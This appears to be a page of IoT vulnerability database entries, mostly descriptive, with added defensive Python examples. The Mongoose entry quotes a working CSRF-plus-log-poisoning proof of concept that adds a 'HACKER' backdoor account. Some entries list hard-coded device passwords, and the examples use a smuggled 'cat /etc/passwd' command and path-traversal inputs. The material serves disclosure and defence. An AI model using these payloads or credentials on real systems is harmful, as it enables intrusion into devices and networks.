VARIoT IoT vulnerabilities database


VAR-201708-1319 CVE-2017-6665 Cisco IOS software and Cisco IOS XE software: cleartext transmission of sensitive information (Autonomic Networking) CVSS V2: 3.3
CVSS V3: 6.5
Severity: MEDIUM
A vulnerability in the Autonomic Networking feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, adjacent attacker to reset the Autonomic Control Plane (ACP) of an affected system and view ACP packets that are transferred in clear text within an affected system (an information disclosure vulnerability). More Information: CSCvd51214. Known Affected Releases: Denali-16.2.1, Denali-16.3.1. Cisco has published this issue as Bug ID CSCvd51214. Cisco IOS is the internetwork operating system used on most Cisco routers and switches. A successful exploit allows the attacker to view ACP packets in clear text or to cause a denial-of-service condition, which may enable further attacks. The attack requires Layer 2 adjacency to the affected system; it cannot be launched from a remote network.
VAR-201708-1359 CVE-2017-6769 Cisco Secure Access Control System Vulnerable to cross-site scripting CVSS V2: 3.5
CVSS V3: 5.4
Severity: MEDIUM
A vulnerability in the web-based management interface of the Cisco Secure Access Control System (ACS) could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the web interface of the affected system. More Information: CSCve70587. Known Affected Releases: 5.8(0.8), 5.8(1.5). Cisco has confirmed this vulnerability and published it as Bug ID CSCve70587. A successful exploit results in the execution of arbitrary attacker-supplied HTML and script code in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials or control how the page is rendered to the user; other attacks are also possible. ACS controls network access and network device administration through the RADIUS and TACACS+ protocols, so a stored payload that fires in an administrator's browser session lands on the system that governs AAA for the network.
VAR-201802-0523 CVE-2017-11633 Wireless IP Camera 360 devices: credentials management vulnerability (RTSP credentials exposed on TCP port 9527) CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
An issue was discovered on Wireless IP Camera 360 devices. Remote attackers can discover RTSP credentials by connecting to TCP port 9527 and reading the InsertConnect field. Wireless IP Camera 360 is a network camera product from Qihu 360 of China. Because the port answers without authentication, anyone who can reach it on the network obtains the credentials needed to view the camera's RTSP stream.
VAR-201802-0525 CVE-2017-11635 Wireless IP Camera 360 devices: information disclosure (recordings readable from the SD card) CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
An issue was discovered on Wireless IP Camera 360 devices. Attackers can read recordings by navigating to /mnt/idea0 or /mnt/idea1 on the SD memory card. Wireless IP Camera 360 is a network camera product from Qihu 360 of China.
VAR-201802-0524 CVE-2017-11634 Wireless IP Camera 360 devices: use of hard-coded credentials (weakly encoded admin password exposed on TCP port 9527) CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
An issue was discovered on Wireless IP Camera 360 devices. Remote attackers can discover a weakly encoded admin password by connecting to TCP port 9527 and reading the password field of the debugging information; for example, nTBCS19C corresponds to a password of 123456. The device therefore contains a vulnerability related to the use of hard-coded credentials. Impact: information disclosure, information tampering and denial of service. Wireless IP Camera 360 is a network camera product from Qihu 360 of China.
VAR-201802-0522 CVE-2017-11632 Wireless IP Camera 360 devices: credentials management vulnerability (root account with known password hash) CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
An issue was discovered on Wireless IP Camera 360 devices. A root account with a known SHA-512 password hash exists, which makes it easier for remote attackers to obtain administrative access via a TELNET session. Because the hash is the same on every unit, it only has to be cracked once to yield a root password that works against every device exposing TELNET. Impact: information disclosure, information tampering and denial of service. Wireless IP Camera 360 is a network camera product from Qihu 360 of China.
VAR-201707-0079 CVE-2015-0674 Cisco Cloud Web Security Vulnerable to cross-site scripting CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
Cross-site scripting (XSS) vulnerability in the Alert Service of Cisco Cloud Web Security base revision allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. The Alert Service is the product's alerting component.
VAR-201707-0041 CVE-2016-10401 ZyXEL PK5001Z devices: credentials management vulnerability (hard-coded su password)

Related entries in the VARIoT exploits database: VAR-E-201710-0220
CVSS V2: 9.0
CVSS V3: 8.8
Severity: HIGH
ZyXEL PK5001Z devices have zyad5001 as the su password, which makes it easier for remote attackers to obtain root access if a non-root account password is known (or a non-root default account exists within an ISP's deployment of these devices). Impact: information disclosure, information tampering and denial of service. The ZyXEL PK5001Z is an ISP-supplied DSL modem/router from ZyXEL Communications of Taiwan. An attacker who can log in to the device as any non-root account, for example a default account provisioned by the ISP, can run su with this password and obtain a root shell; the su password is the same on every unit and cannot be changed by the customer.
VAR-201707-1360 No CVE TP-Link PTWR841N V8 Router Configuration Service Logic Vulnerability CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
The TP-Link PTWR841N V8 is a wireless router. A logic vulnerability in its configuration service allows the device's credentials to be reset, and a stack overflow in the same service allows code execution. An attacker can also use these flaws to modify router settings, for example to reroute traffic to a malicious server.
VAR-201707-1355 No CVE HP Printer Remote Command Execution Vulnerability CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
The HP OfficeJet Pro 8210 is a printer from Hewlett Packard (HP). A remote command execution vulnerability exists in the printer firmware; an attacker can exploit it to execute arbitrary code on the device.
VAR-201707-1359 No CVE UTstarcom WA3002G4 Unauthenticated DNS Change Vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The UTStarcom WA3002G4 is a DSL broadband router. A security vulnerability in the device allows an attacker to change its DNS settings without authentication and thereby redirect users of the vulnerable device to a malicious site.
VAR-201707-0779 CVE-2017-11614 MEDHOST Connex: use of hard-coded credentials CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
MEDHOST Connex contains hard-coded credentials that are used for customer database access. An attacker with knowledge of the hard-coded credentials and the ability to communicate directly with the database may be able to obtain or modify sensitive patient and financial information. Connex uses an IBM i DB2 user account for database access. The account name is HMSCXPDN; its password is hard-coded in multiple places in the application, and customers do not have the option to change it. The account has elevated DB2 roles and can access all objects or database tables in the customer's DB2 database, through ODBC, FTP and TELNET. Customers without Connex installed are still vulnerable because the MEDHOST setup program creates this account. Impact: information disclosure, information tampering and denial of service. Because the password cannot be rotated, the practical mitigations are network-level: restrict the ODBC, FTP and TELNET services on the IBM i host to the Connex application servers and alert on any use of the HMSCXPDN profile from another source.
VAR-201711-0984 CVE-2017-8146 Huawei P10 and P10 Plus smartphone software: input validation vulnerability CVSS V2: 4.3
CVSS V3: 5.5
Severity: MEDIUM
The call module of P10 and P10 Plus smartphones with software versions before VTR-AL00C00B167, VTR-TL00C01B167, VKY-AL00C00B167 and VKY-TL00C01B167 has a DoS vulnerability. An attacker may trick a user into installing a malicious application, and the application can send a crafted parameter to the call module to crash the call and data communication process. The Huawei P10 and P10 Plus are Huawei smartphone products; the call module handles voice calls.
VAR-201711-0983 CVE-2017-8145 Huawei P10 and P10 Plus smartphone software: input validation vulnerability CVSS V2: 4.3
CVSS V3: 5.5
Severity: MEDIUM
The call module of P10 and P10 Plus smartphones with software versions before VTR-AL00C00B167, VTR-TL00C01B167, VKY-AL00C00B167 and VKY-TL00C01B167 has a DoS vulnerability. An attacker may trick a user into installing a malicious application, and the application can send a crafted parameter to the call module to crash the call and data communication process. The Huawei P10 and P10 Plus are Huawei smartphone products; the call module handles voice calls.
VAR-201711-0982 CVE-2017-8144 Multiple Huawei smartphone software: resource management vulnerability CVSS V2: 7.1
CVSS V3: 5.5
Severity: MEDIUM
Honor 5A, Honor 8 Lite, Mate 9, Mate 9 Pro, P10 and P10 Plus Huawei smartphones with software versions before CAM-L03C605B143CUSTC605D003, Prague-L03C605B161, Prague-L23C605B160, MHA-AL00C00B225, LON-AL00C00B225, VTR-AL00C00B167, VTR-TL00C01B167, VKY-AL00C00B167 and VKY-TL00C01B167 respectively have a resource exhaustion vulnerability due to a configuration setting. An attacker tricks a user into installing a malicious application; the application may turn on the device flashlight and rapidly drain the device battery. Impact: denial of service. The affected products, all Huawei smartphones, and their versions:
Honor 5A (Honor Play 5A): versions before CAM-L03C605B143CUSTC605D003
Honor 8 Lite (Honor 8 Youth Edition): versions before Prague-L03C605B161 and Prague-L23C605B160
Mate 9: versions before MHA-AL00C00B225
Mate 9 Pro: versions before LON-AL00C00B225
P10: versions before VTR-AL00C00B167 and VTR-TL00C01B167
P10 Plus: versions before VKY-AL00C00B167 and VKY-TL00C01B167
VAR-201808-0162 CVE-2017-11564 D-Link EyeOn Baby Monitor Command injection vulnerability CVSS V2: 9.0
CVSS V3: 8.8
Severity: HIGH
The D-Link EyeOn Baby Monitor (DCS-825L) 1.08.1 has multiple command injection vulnerabilities in the web service framework. An attacker can forge malicious HTTP requests to execute commands; authentication is required before executing the attack. The EyeOn Baby Monitor DCS-825L is a baby monitor from D-Link.
# Vulnerability Type
Command Injection
# Affected Product Code Base
DCS-825L EyeOn Baby Monitor - 1.08.1
# Affected Component
web service framework
# Attack Type
Remote
# Attack Vectors
Send a crafted HTTP request
# Discoverer
Dove Chiu (Trend Micro)
# Vulnerability Detail
We found that parts of the web framework are written in shell scripts. Additionally, upon reviewing the files, we found that parts of the variables can be controlled from user input. Fortunately, the web server uses basic authentication first, before anyone can access any webpage.
Reference: https://documents.trendmicro.com/assets/tech_brief_Device_Vulnerabilities_in_the_Connected_Home2.pdf
# Status
Fixed in the latest beta firmware
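The injection pattern this entry describes (a request parameter spliced into a shell command by a CGI script) in an added example that is not D-Link's code and not from the Trend Micro report: a Python stand-in for the vulnerable shell helper, a tokenizer that shows how /bin/sh would split the injected value, and two hardened variants (quoting when a shell is unavoidable, an argv list plus allowlist otherwise). The ping helper, the host parameter and the sample value are assumptions for illustration; the DCS-825L's real scripts and parameter names are not on the page. The same pattern is the one reported for the pingAddr parameter of waitPingqry.cgi in the Cisco DDR2200 entry below.

```python
import re
import shlex
import subprocess
from typing import List

# Added example, not D-Link's code. The parameter name, the ping helper and the
# sample attacker value are assumptions for illustration.

# Allowlist for what a ping target may look like: a host name or IPv4 literal.
HOST_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")


def build_command_vulnerable(host: str) -> str:
    """Equivalent of a CGI shell script doing `ping -c 1 $HOST`: the raw
    parameter becomes part of a string that /bin/sh will parse again."""
    return f"ping -c 1 {host}"


def build_command_quoted(host: str) -> str:
    """If a shell is unavoidable, quote the value so the shell sees one word."""
    return f"ping -c 1 {shlex.quote(host)}"


def build_command_hardened(host: str) -> List[str]:
    """Preferred form: validate against the allowlist and return an argv list,
    which subprocess passes to execve() without any shell parsing."""
    if not HOST_RE.fullmatch(host):
        raise ValueError(f"rejected host parameter: {host!r}")
    return ["ping", "-c", "1", host]


def commands_in(cmdline: str) -> List[List[str]]:
    """Split a command line the way sh would: quotes are honoured, and ';',
    '&', '&&', '|' and '||' end one command and start the next. Used here to
    show which separate commands a given string would actually run."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands: List[List[str]] = []
    current: List[str] = []
    for tok in lexer:
        if tok in (";", "&", "&&", "|", "||"):
            if current:
                commands.append(current)
                current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def run_ping(host: str) -> int:
    """Hardened execution path: argv list, no shell, bounded runtime."""
    argv = build_command_hardened(host)
    return subprocess.run(argv, capture_output=True, timeout=10, check=False).returncode


if __name__ == "__main__":
    injected = "192.0.2.1;cat /etc/passwd"  # constructed attacker value
    print("vulnerable runs:", commands_in(build_command_vulnerable(injected)))
    print("quoted runs:    ", commands_in(build_command_quoted(injected)))
    try:
        build_command_hardened(injected)
    except ValueError as err:
        print("hardened:       ", err)
```

`commands_in` is only a visualiser; the fix is the argv list with an allowlist, and the allowlist is what makes the basic-authentication gate mentioned above irrelevant to the outcome, since an authenticated user should still not be able to run arbitrary commands.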
VAR-201709-1035 CVE-2017-11567 Mongoose Web Server Vulnerable to cross-site request forgery CVSS V2: 6.8
CVSS V3: 8.8
Severity: HIGH
Cross-site request forgery (CSRF) vulnerability in Mongoose Web Server before 6.9 allows remote attackers to hijack the authentication of users for requests that modify Mongoose.conf via a request to __mg_admin?save. NOTE: this issue can be leveraged to execute arbitrary code remotely. Exploiting this issue may allow a remote attacker to perform unauthorized actions and gain access to the affected application; other attacks are also possible. Mongoose Web Server versions prior to 6.9 are vulnerable. Mongoose is a multi-protocol embedded networking library providing TCP, HTTP client and server, WebSocket client and server, MQTT client and broker, and more.

However, if the Mongoose web server is installed as a service then executing programs, e.g. "calc.exe", may at times crash or fail to appear, but you may see them in Windows taskmgr.exe. Therefore, from my tests, commands may become unstable when Mongoose is run as a service. When Mongoose is run in standard mode, attackers can potentially modify "Mongoose.conf" and create arbitrary files on the server, like .PHP etc., and point Mongoose to this as its new "index" file. Then you need to tell Mongoose its "access_log_file" is the new attacker-generated file, after injecting commands into the Mongoose web server's log file that will get executed when the log file is later requested. This vulnerability requires the CGI interpreter to already be set, or some information about the target to be known, like the CGI path and language ("pl", "php", "cgi") used, so that we can set the correct programming language when the file is created during the initial CSRF attack. Note: if running commands with arguments, we have to use "\t" tab chars, as using a space will break our TELNET-based code injection into the server log, e.g.

GET<?php exec("cmd.exe\t/c\tnet\tuser\tHACKER\tabc123\t/add");?> HTTP/1.1

OR just TELNET to the Mongoose web server, inject arbitrary commands, then call exec by making another TELNET HTTP GET.
Mongoose.conf as modified by the attack:

# For detailed description of every option, visit
# https://github.com/cesanta/Mongoose
# Lines starting with '#' and empty lines are ignored.
# To make a change, remove leading '#', modify option's value,
# save this file and then restart Mongoose.

# access_control_list
access_log_file C:\Mongoose.access.php      <======= BOOM
# auth_domain mydomain.com
cgi_interpreter c:\xampp\php\php.exe        <====== MUST BE SET
# cgi_pattern **.cgi$|**.pl$|**.php$
# dav_auth_file
# dav_root
# debug 0
document_root C:\
# enable_directory_listing yes
# error_log_file
# extra_headers
# extra_mime_types
# global_auth_file
# hide_files_patterns
# hexdump_file
index_files Mongoose.access.php             <======== BOOM
# listening_port 8080
# run_as_user
# ssi_pattern **.shtml$|**.shtm$
# ssl_certificate
# ssl_ca_certificate
# start_browser yes
# url_rewrites

Mongoose log file command inject to create backdoor.
-----------------------------------------------------------
2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 -
2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 -
2017-07-24 03:12:30 - 127.0.0.1 - GET<?php exec("cmd.exe\t/c\tnet\tuser\tHACKER\tabc123\t/add");?> 400 0 -
2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 -
2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin?get_settings 200 4294967295 http://127.0.0.1:8080/__mg_admin
2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin?get_cfg_file_status 200 4294967295 http://127.0.0.1:8080/__mg_admin
2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /favicon.ico 404 0 -

Tested Windows 7.

Exploit/POC:
=============
1) add backdoor account POC.

<form action="http://127.0.0.1:8080/__mg_admin?save" method="post">
<input type="hidden" name="access_log_file" value="Mongoose.access.php">
<input type="hidden" name="cgi_pattern" value="**.cgi$|**.pl$|**.php">
<input type="hidden" name="index_files" value="Mongoose.access.php">
<input type="hidden" name="cgi_interpreter" value="c:\xampp\php\php.exe">
<script>document.forms[0].submit()</script>
</form>

2) TELNET x.x.x.x 8080
GET<?php exec("cmd.exe\t/c\tnet\tuser\tHACKER\tabc123\t/add");?> HTTP/1.1
Enter Enter

TELNET x.x.x.x 8080
GET / HTTP/1.1
Enter Enter

Done, backdoor added!
====================

1) run calc.exe POC.

<form action="http://127.0.0.1:8080/__mg_admin?save" method="post">
<input type="hidden" name="cgi_pattern" value="**.cgi$|**.pl$|**.exe">
<input type="hidden" name="index_files" value="../../../../../../Windows/system32/calc.exe">
<input type="hidden" name="cgi_interpreter" value="../../../../../../Windows/system32/calc.exe">
<script>document.forms[0].submit()</script>
</form>

2) TELNET x.x.x.x 8080
GET / HTTP/1.1
Enter Enter

Network Access:
===============
Remote

Severity:
=========
Medium

Disclosure Timeline:
=================================
Vendor Notification: July 23, 2017
Vendor Notification: July 28, 2017
Vendor Acknowledgement: July 31, 2017
Vendor Fixed released version 6.9 : September 4, 2017
September 4, 2017 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
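The two things a defender can check for from the advisory above, as an added example that is neither Mongoose's code nor the advisory author's: first, whether a Mongoose.conf has the precondition the log-poisoning step depends on (the access log being matched by cgi_pattern, listed in index_files, or sitting inside document_root); second, a scan of access-log lines for the poisoned request line and for writes to __mg_admin?save. The weak configuration and the log lines are copied from the advisory; the POST ?save line, the hardened configuration and the `attacker.invalid` referer are constructed for the example. The cgi_pattern default is taken from the commented-out line in the advisory's config file.

```python
import re
from typing import Dict, List

# Added example, not Mongoose's code and not part of the advisory. Weak config
# and log lines are copied from the advisory; the ?save line and the hardened
# config are constructed.

# ---- 1. configuration: does the access log double as an executable page? ----

def parse_mongoose_conf(text: str) -> Dict[str, str]:
    """One 'option value' per line; '#' lines and blanks are ignored, as the
    header of the generated config file states."""
    opts: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#"):
            key, _, value = line.partition(" ")
            opts[key] = value.strip()
    return opts


def pattern_to_regex(pattern: str) -> "re.Pattern[str]":
    """Mongoose glob syntax: '**' spans directory separators, '*' does not,
    '$' anchors the end, '|' separates alternatives; matching is prefix-based."""
    out: List[str] = []
    i = 0
    while i < len(pattern):
        if pattern.startswith("**", i):
            out.append(".*")
            i += 2
            continue
        ch = pattern[i]
        out.append({"*": r"[^/\\]*", "$": "$", "|": "|"}.get(ch, re.escape(ch)))
        i += 1
    return re.compile("".join(out), re.IGNORECASE)


DEFAULT_CGI_PATTERN = "**.cgi$|**.pl$|**.php$"  # default shown (commented) in the advisory's config


def check_conf(opts: Dict[str, str]) -> List[str]:
    """Return one finding per way the access log becomes web-executable."""
    findings: List[str] = []
    log = opts.get("access_log_file", "")
    if not log:
        return findings
    cgi = opts.get("cgi_pattern", DEFAULT_CGI_PATTERN)
    if pattern_to_regex(cgi).match(log):
        findings.append(f"access_log_file {log!r} matches cgi_pattern {cgi!r}: poisoned lines run as CGI")
    name = re.split(r"[\\/]", log)[-1]
    if name in [n.strip() for n in opts.get("index_files", "").split(",")]:
        findings.append(f"{name!r} is listed in index_files: the log is served for '/'")
    root = opts.get("document_root", "")
    if root and log.lower().replace("/", "\\").startswith(root.lower().replace("/", "\\")):
        findings.append(f"access_log_file {log!r} lies inside document_root {root!r}: reachable over HTTP")
    return findings


# ---- 2. access log: poisoned request lines and admin-endpoint writes --------

LOG_LINE = re.compile(r"^(\S+ \S+) - (\S+) (\S+) (.*) (\d{3}) (\d+|-) (\S+)$")
REQUEST_OK = re.compile(r"^(GET|POST|HEAD|PUT|DELETE|OPTIONS) /")
SCRIPT_MARKERS = ("<?", "<%", "#!")


def scan_access_log(lines: List[str]) -> List[dict]:
    """Flag request lines that are not 'METHOD /path' or carry script markers
    (log poisoning), and any request to the config-saving admin endpoint."""
    findings: List[dict] = []
    for n, line in enumerate(lines, 1):
        m = LOG_LINE.match(line)
        if not m:
            continue
        _when, client, _host, request, _status, _size, referer = m.groups()
        if not REQUEST_OK.match(request) or any(t in request for t in SCRIPT_MARKERS):
            findings.append({"line": n, "kind": "log-poisoning", "client": client, "request": request})
        if "__mg_admin?save" in request:
            findings.append({"line": n, "kind": "admin-config-write", "client": client, "referer": referer})
    return findings


SAMPLE_CONF_WEAK = r"""
# cgi_pattern **.cgi$|**.pl$|**.php$
access_log_file C:\Mongoose.access.php
cgi_interpreter c:\xampp\php\php.exe
document_root C:\
index_files Mongoose.access.php
"""

SAMPLE_CONF_FIXED = r"""
access_log_file C:\logs\mongoose.access.log
cgi_interpreter c:\xampp\php\php.exe
document_root C:\www
index_files index.html
"""

SAMPLE_LOG = [
    "2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 -",
    r'2017-07-24 03:12:30 - 127.0.0.1 - GET<?php exec("cmd.exe\t/c\tnet\tuser\tHACKER\tabc123\t/add");?> 400 0 -',
    "2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin?get_settings 200 4294967295 http://127.0.0.1:8080/__mg_admin",
    # constructed: what the CSRF form's submission would leave behind
    "2017-07-24 03:12:35 - 127.0.0.1 127.0.0.1:8080 POST /__mg_admin?save 200 0 http://attacker.invalid/",
]

if __name__ == "__main__":
    for name, conf in (("weak", SAMPLE_CONF_WEAK), ("fixed", SAMPLE_CONF_FIXED)):
        print(name, check_conf(parse_mongoose_conf(conf)))
    for f in scan_access_log(SAMPLE_LOG):
        print(f)
```

The hardened configuration keeps the log outside document_root with an extension no CGI pattern matches; that closes the execution step even if a CSRF still rewrites other options, which is why the admin-config-write finding is worth alerting on separately, with its referer.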
VAR-201707-0755 CVE-2017-11587 Multiple Cisco Residential Gateway products: path traversal vulnerability CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
On Cisco DDR2200 ADSL2+ Residential Gateway DDR2200B-NA-AnnexA-FCC-V00.00.03.45.4E and DDR2201v1 ADSL2+ Residential Gateway DDR2201v1-NA-AnnexA-FCC-V00.00.03.28.3 devices, there is directory traversal in the filename parameter to the /download.conf URI. Remote attackers can send requests containing directory-traversal sequences ('../') in that parameter to read arbitrary files in the context of the application, which may aid in further attacks. The same firmware releases are also reported to accept shell metacharacters in the 'pingAddr' parameter of waitPingqry.cgi, a command-injection issue separate from this traversal.
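The filename-parameter pattern from this entry, as an added example that is not Cisco's firmware code: the vulnerable string join beside a hardened resolver that canonicalises the path and enforces containment, exercised against plain, absolute, nested and URL-encoded traversal inputs. The base directory, the file names and the `handle_download` name are assumptions for illustration; only the parameter pattern comes from the entry.

```python
import os
import tempfile
from urllib.parse import unquote

# Added example, not Cisco's firmware code. Base directory and file names are
# assumptions for illustration.


def resolve_vulnerable(base_dir: str, filename: str) -> str:
    """Joins the raw parameter: '../' walks out of base_dir, and an absolute
    path makes os.path.join discard base_dir entirely."""
    return os.path.join(base_dir, filename)


def resolve_safe(base_dir: str, filename: str) -> str:
    """Canonicalise, then require containment. realpath() collapses '..' and
    follows symlinks; commonpath() avoids the '/www' vs '/www2' prefix trap."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, filename))
    if target == base or os.path.commonpath([base, target]) != base:
        raise PermissionError(f"traversal rejected: {filename!r}")
    return target


def handle_download(base_dir: str, raw_param: str) -> str:
    """What a /download.conf?filename=... handler should do: decode the
    parameter once, then resolve it with containment enforced."""
    return resolve_safe(base_dir, unquote(raw_param))


TRAVERSAL_INPUTS = ("../secret.conf", "/etc/passwd", "sub/../../secret.conf", "%2e%2e/secret.conf")


def demo() -> dict:
    """Run both resolvers against benign and traversal inputs in a throw-away
    directory and report which inputs escape or are rejected."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        base = os.path.join(tmp, "www")
        os.makedirs(base)
        real_base = os.path.realpath(base)
        # vulnerable resolver: both traversal forms land outside base
        results["vuln_dotdot_escapes"] = not os.path.normpath(
            resolve_vulnerable(base, "../secret.conf")).startswith(base + os.sep)
        results["vuln_absolute_escapes"] = resolve_vulnerable(base, "/etc/passwd") == "/etc/passwd"
        # hardened resolver: benign name allowed, every traversal form rejected
        results["safe_allows_benign"] = handle_download(base, "config.txt") == os.path.join(real_base, "config.txt")
        for bad in TRAVERSAL_INPUTS:
            try:
                handle_download(base, bad)
                results[bad] = "ALLOWED"
            except PermissionError:
                results[bad] = "rejected"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Decoding exactly once before resolving matters: decoding after the containment check, or decoding twice, re-opens the hole for `%2e%2e` and `%252e` variants.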
VAR-201907-1044 CVE-2017-11579 Blipcare Wireless Blood pressure monitor: open wireless network exposes credentials CVSS V2: 4.8
CVSS V3: 7.1
Severity: HIGH
In the most recent firmware for Blipcare, the device provides an open wireless network called "Blip" for communicating with the device. The user connects to this open wireless network and uses the device's web management interface to enter the user's Wi-Fi credentials so that the device can connect to that network and have Internet access. The device is a wireless blood pressure monitor used to measure a person's blood pressure. Because the network is open, an attacker within range of the wireless signal generated by the Blipcare device can easily sniff the credentials. An attacker can also connect to the open "Blip" network and modify the HTTP responses presented to the user by the device to execute other attacks, such as convincing the user to download and execute a malicious binary that infects the user's computer or mobile device with malware.
VAR-201907-1043 CVE-2017-11578 Blipcare Wireless Blood pressure monitor Vulnerable to information disclosure CVSS V2: 4.3
CVSS V3: 5.9
Severity: MEDIUM
Research on IoT devices found that the most recent firmware for the Blipcare device allows connections to the web management interface over plain-text HTTP rather than TLS. The user uses the web management interface to enter the user's Wi-Fi credentials so that the device can connect to that network and have Internet access. The device is a wireless blood pressure monitor used to measure a person's blood pressure. An attacker connected to the Blipcare device's wireless network can easily sniff these values with a man-in-the-middle attack.